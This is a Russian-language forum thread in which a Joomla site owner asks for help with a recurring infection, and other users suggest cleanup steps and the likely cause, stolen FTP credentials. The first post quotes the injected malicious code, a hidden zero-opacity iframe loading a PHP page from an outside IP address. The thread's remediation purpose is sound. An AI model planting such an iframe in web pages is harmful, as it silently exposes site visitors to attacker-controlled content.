Помогите, пожалуйста. <iframe width="468" height="60" src="http://195.14.112.168/124.php" и т.д.

Тема в разделе "Сайт умер, лежит и не дышит", создана пользователем Vadben, 26.04.2011.

  1. Offline

    Vadben Недавно здесь

    Регистрация:
    26.04.2011
    Сообщения:
    3
    Симпатии:
    0
    Пол:
    Мужской
    Каждое утро на сайте возникает одна и та же проблема. Он останавливает свою работу. И ругается на строчку ошибка Parse error: syntax error, unexpected '<' in /home/rospoets/rospoets.ru/docs/index.php on line 88.
    Естественно, захожу туда и в самом конце после ?> вижу эту строчку:
    <iframe width="468" height="60" src="http://195.14.112.168/124.php" style="top:0px; position:relative; border:0px; right:-550px; opacity:0; -moz-opacity:0;filter:progid:dxImageTransform.Microsoft.Alpha(opacity=0)"></iframe>

    Удаляю.

    Далее идет ссылка на такой же index.php на уже в joomla/libraries

    Удаляю.

    Третим этапом ссылка на такую же строку в модуле mainmenu/tmpl, но уже в файле default.php

    Еще раз удаляю. Сайт начинает функционировать.
    Но на следующее утро всё повторяется по новой. Возможно, это происходит поздно вечером предыдущего дня, точно не могу сказать.
    Я в этом деле получайник, сам администрирую сайт, сам же руковожу проектом.
    Будьте добры, помогите.
     
  2.  
  3. draff
    Offline

    draff Russian Joomla! Team Команда форума

    Регистрация:
    17.01.2011
    Сообщения:
    6 054
    Симпатии:
    520
    Пол:
    Мужской
    Последнее редактирование модератором: 31.03.2014
  4. Offline

    Vadben Недавно здесь

    Регистрация:
    26.04.2011
    Сообщения:
    3
    Симпатии:
    0
    Пол:
    Мужской
    Почитал. Фаерволл у меня установлен, индексы базы данных заменены еще в момент переноса сайта на домен. Практически всё, что там написано, у меня сделано еще в самом начале работы по инструкциям Евгения Попова.
    Но эта ошибка возникла всего десять дней назад. Это сайт огромной организации, у которой, естественно, есть недруги, друзья. Если бы какому-то хакеру понадобилось испортить нам жизнь, они сделали бы это покруче.
     
  5. Offline

    DeVit Недавно здесь

    Регистрация:
    12.12.2009
    Сообщения:
    1
    Симпатии:
    0
    Пол:
    Мужской
    У меня такая проблема стала в пятницу 22 Апреля: На одном хостинге выскакивало сообщение про ошибку в строке, другой хостинг закрыл сайты полностью.
    Перед праздниками разбираться времени не было, поэтому решал проблему в лоб:
    - Залил каждый сайт на свой комп
    - Поиском (я пользую PSPad Editor) все файлы в папке сайта, содержащие зловред - " <iframe...... Alpha(opacity=0)"> " (рекомендую сначала проверить общее количество файлов с упоминанием 195.14.112.168) и заместил пробелом.
    - Перезалил на хостинг.
    Зловред прописывается в файлах .htm и .php.
    Соответственно, разное количество зараженных файлов в зависимости размера сайта: у меня вышло от 130 до 1020 файлов!
    Все сайты восстановились, бан словить вроде не успел?!
    Сейчас хостер смотрит логи - может где остались следы зловреда.
    По мнению хостеров пароли слились через FileZilla (кто-то утянул через него все пароли), поэтому лучше еще раз проверить своего клиента и не перзаливать подчищенные сайты с помощью него же....

    Работки на пол-часа у тебя есть ;) если мой хостер даст еще рекомендации - отпишусь...
     
  6. draff
    Offline

    draff Russian Joomla! Team Команда форума

    Регистрация:
    17.01.2011
    Сообщения:
    6 054
    Симпатии:
    520
    Пол:
    Мужской
    Vadben,
    Попробуй еще с наблюдателем http://extensions.lesarbresdesign.info/en/extensions/eyesite После установки,или без установки определись когда происходят изменения в файлах и смотри доступ к сайту в логах хостинга.

    Смотрел литл-версию,не впечатлил.
    Ну еще всё впереди.Просто челу нужен трафик,зачем ему портить так чтобы его искали.

    А что Попов уже учит работе на уровне сисадмина сервера?(шутка)
     

Поделиться этой страницей

Загрузка...